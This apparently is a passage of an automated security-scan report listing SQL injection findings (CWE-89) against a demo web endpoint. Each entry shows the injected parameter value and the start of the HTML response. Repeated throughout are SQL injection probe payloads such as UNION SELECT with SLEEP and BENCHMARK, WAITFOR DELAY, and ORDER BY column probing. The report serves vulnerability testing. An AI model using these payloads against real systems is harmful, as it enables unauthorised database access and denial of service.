Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1056\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1057\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11--ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1058\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \") or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #1059\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1060\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AS INJECTX WHERE 1=1 AND 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1061\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io or benchmark(50000000,MD5(1))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1062\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1063\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 31337#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1064\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1065\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ';WAITFOR DELAY '0:0:30'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1066\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1067\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioHAVING 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1068\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1069\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'\n)),4,5,6,7,8,9,10#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript 